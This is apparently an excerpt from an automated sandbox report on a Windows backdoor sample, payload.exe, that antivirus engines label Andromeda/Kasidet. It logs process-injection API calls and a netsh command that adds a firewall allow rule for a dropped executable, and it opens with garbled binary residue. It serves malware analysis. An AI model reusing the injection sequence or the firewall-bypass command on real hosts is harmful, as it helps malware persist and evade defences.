3333$4d4y44Ô45R5u5ü5}66Ô6;7Q7µ7þ748_8¶8»8Ï8æ8î8ü8w9:::!;(;Y;?<F<{<<<ó<ú<==©=°=>=>^>ó>??2?M?????²?è?=0C0W0`0p0}00¯0¸0ç0ì0>1~111¬12«52676I6N6[6l6z66 77±8½8ì8:$:Þ:è:ò:ü:;;;J;T;^;h;;®;´;Ã;Ê;¤<ñ<"={>¼>Ò>Ø>ç>î>î? :0k0Þ1í1ý12_2Ó2Ù2é2ð2^3 4G4]4ú4!5C5H5]5b5p5w55¢5å57=7d8ñ8999á9ê9ù9:e:Ê:Ñ:{;Ð;ã;<=n===¬=Ç=%><>E>f>>£>±>¶>Ê>]?° 0À42826 base_address: 0x0041b000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3008 process_handle: 0x00000110	1	1
NtSetContextThread July 22, 2023, 9:41 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4202868 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000010c process_identifier: 3008	1	0
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x0000010c suspend_count: 1 process_identifier: 3008	1	0
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 2828 thread_handle: 0x00000084 process_identifier: 2824 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 127.0.0.1 -n 3 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2824	1	0
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 2948 thread_handle: 0x00000084 process_identifier: 2944 current_directory: C:\Windows\system32\wbem filepath: C:\Windows\System32\netsh.exe track: 1 command_line: netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe" filepath_r: C:\Windows\system32\netsh.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2944	1	0

File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 events)

Bkav	W32.Common.65C381EC
Lionic	Trojan.Win32.Androm.4!c
MicroWorld-eScan	Gen:Variant.Doina.48068
CAT-QuickHeal	Trojan.MauvaiseRI.S5242859
McAfee	W32/Patcher
Malwarebytes	Malware.AI.20242711
Sangfor	Suspicious.Win32.Save.ins
K7AntiVirus	Trojan ( 0052099b1 )
Alibaba	Malware:Win32/km_24a4a.None
K7GW	Trojan ( 0052099b1 )
Cybereason	malicious.260eb3
Arcabit	Trojan.Doina.DBBC4
VirIT	Trojan.Win32.Kasidet.BA
Cyren	W32/Scar.Z.gen!Eldorado
Symantec	SMG.Heur!gen
Elastic	malicious (high confidence)
ESET-NOD32	Win32/Kasidet.AR
Cynet	Malicious (score: 100)
APEX	Malicious
ClamAV	Win.Trojan.Gamarue-7104066-1
Kaspersky	Backdoor.Win32.Androm.lctq
BitDefender	Gen:Variant.Doina.48068
NANO-Antivirus	Virus.Win32.Gen.ccmw
SUPERAntiSpyware	Backdoor.Andromeda/Variant
Avast	Win32:BotX-gen [Trj]
Tencent	Malware.Win32.Gencirc.10b31355
TACHYON	Backdoor/W32.Androm.102912.E
Emsisoft	Gen:Variant.Doina.48068 (B)
F-Secure	Trojan.TR/AD.Ambler.bdftd
DrWeb	Trojan.Kasidet.26
VIPRE	Gen:Variant.Doina.48068
TrendMicro	BKDR_ANDROM.SMQ
McAfee-GW-Edition	BehavesLike.Win32.Swizzor.cc
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.1dc2580260eb3d20
Sophos	Mal/Generic-S
Ikarus	Trojan-Dropper.Win32.Randrew
Jiangmin	Backdoor.Androm.lcz
Webroot	W32.Trojan.Gen
Avira	TR/AD.Ambler.bdftd
Antiy-AVL	Trojan[Backdoor]/Win32.Androm
Gridinsoft	Trojan.Win32.Dropper.zv!s3
Xcitium	TrojWare.Win32.TrojanDropper.Randrew.B@7a247q
Microsoft	TrojanDropper:Win32/Randrew.B!bit
ViRobot	Trojan.Win32.Agent.102912.AE
ZoneAlarm	Backdoor.Win32.Androm.lctq
GData	Gen:Variant.Doina.48068
Google	Detected
AhnLab-V3	Backdoor/Win32.RL_Androm.R299528
BitDefenderTheta	AI:Packer.F5A402241E

payload.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All